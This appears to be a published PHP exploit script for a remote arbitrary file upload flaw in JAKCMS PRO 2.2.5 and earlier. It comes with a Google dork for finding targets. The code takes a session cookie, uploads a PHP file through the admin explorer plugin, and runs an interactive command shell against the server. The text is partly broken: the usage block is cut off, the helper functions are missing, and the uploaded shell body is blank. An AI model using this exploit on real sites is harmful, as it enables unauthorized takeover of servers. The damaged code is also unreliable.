# Exploit Title: JAKCMS PRO <= 2.2.5 Remote Arbitrary File Upload Exploit # Google Dork: "Powered By JAKCMS" # Date: 21/09/2011 # Author: EgiX # Software Link: http://www.jakcms.com/ # Version: 2.2.5 # Tested on: Windows 7 and Debian 6.0.2 \n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /jakcms/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $packet = "GET {$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m); $sid = $m[1]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n"; $payload .= "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n"; $payload .= "\r\n"; $payload .= "--o0oOo0o--\r\n"; $get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh")); $packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: PHPSESSID={$sid}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; if (preg_match("/Error/", http_send($host, $packet))) die("\n[-] Upload failed!\n"); $packet = "GET {$path}cache/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\njakcms-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>